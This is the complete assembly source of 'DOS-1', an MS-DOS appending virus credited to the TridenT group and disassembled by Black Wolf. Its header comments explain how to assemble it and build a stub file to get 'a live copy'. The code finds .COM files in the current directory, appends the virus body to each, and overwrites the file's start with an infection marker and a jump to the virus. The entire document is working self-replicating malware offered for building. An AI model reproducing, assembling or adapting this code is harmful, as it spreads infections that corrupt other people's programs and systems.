;DOS1 virus by the TridenT research group - Direct Action appending .COM ;This virus infects .COM files in the current directory using FCB's. ;Other than FCB use, the virus is VERY simple. Avoids infecting misnamed ;EXE files by using an 'M' at the beginning of files to mark infection. ;This virus requires a stub file made from the following debug script, ;to make it, compile the virus, then create the stub file by removing the ;semicolons from the code between the lines, saving it, and calling it ;vstub.hex. Then use the following commands: ; Debug <vstub.hex ; Copy /b vstub.com+dos1.com virus.com ;And you will have a live copy of the DOS-1 virus. Please be careful ;with it and do not release it. ;-=-=-=-=-=-=-=-=-=-=-=-=-=ð[Begin Debug Script]ð=-=-=-=-=-=-=-=-=-=-=-=-= ;e100 4d eb 6 90 90 ;rbx ;0 ;rcx ;5 ;nvstub.com ;w ;q ;-=-=-=-=-=-=-=-=-=-=-=-=-=ð[End Debug Script]ð=-=-=-=-=-=-=-=-=-=-=-=-= ;Disassembly by Black Wolf .model tiny .code org 100h start: dec bp nop int 20h HostFile: ;Not present to preserve original compiler offsets..... Virus_Entry: call GetOffset Displacement: db 'DOS-1',0 GetOffset: pop si sub si,offset Displacement-start cld mov di,100h push di ;Push DI on stack for ret... push si ;Restore host file... movsw movsw pop si lea dx,[si+VirusDTA-start] ;set DS:DX = DTA call SetDTA mov ax,1100h ;Find first filename w/FCB's FindFirstNext: lea dx,[si+SearchString-start] int 21h ;Find first/next filename ;using FCB's (*.COM) or al,al ;Were any .COM files found? jnz ResetDTA ;No.... exit virus. lea dx,[si+VirusDTA-start] mov ah,0fh int 21h ;open .COM file w/FCB or al,al ;Successful? jnz FindNextFile ;No - find another. push dx ;Push offset of DTA mov di,dx mov word ptr [di+0Eh],1 ;Set bytes per record to 1 xor ax,ax mov [di+21h],ax ;Set Random Record Num to 0 mov [di+23h],ax ;? lea dx,[si] call SetDTA ;Set DTA to just before virus ;code in memory - Storage bytes.. lea dx,[di] ;DX = Virus DTA mov ah,27h mov cx,4 int 21h ;Read first 4 bytes w/FCB cmp byte ptr [si],'M' ;Is it an EXE file or infected? je CloseFile ;exit... mov ax,[di+10h] ;AX = Filesize mov [di+21h],ax ;Set current record to EOF cmp ax,0F800h ;Is file above F800h bytes? ja CloseFile ;Too large, exit push ax lea dx,[si] call SetDTA ;Set DTA to storage bytes/virus. lea dx,[di] mov ah,28h mov cx,end_virus-start int 21h ;Write virus to end of file. xor ax,ax mov [di+21h],ax ;Reset file to beginning. lea di,[si] ;Point DI to DTA mov ax,0E94Dh ;4dh E9h = marker and jump stosw pop ax ;AX = jump size stosw ;Put marker and jump into DTA push dx lea dx,[si] call SetDTA ;Set DTA for write pop dx mov ah,28h mov cx,4 int 21h ;Write in ID byte 'M' and jump CloseFile: pop dx call SetDTA mov ah,10h int 21h ;Close file w/FCB FindNextFile: mov ah,12h jmp short FindFirstNext ;Find next file... ResetDTA: mov dx,80h ;80h = default DTA call SetDTA retn SetDTA: mov ah,1Ah int 21h ;Set DTA to DS:DX retn db 'MK' ;Musad Khafir's signature SearchString: db 0 ;Default Drive db '????????COM' ;Search for all .COM files. end_virus: org 1d1h VirusDTA: end start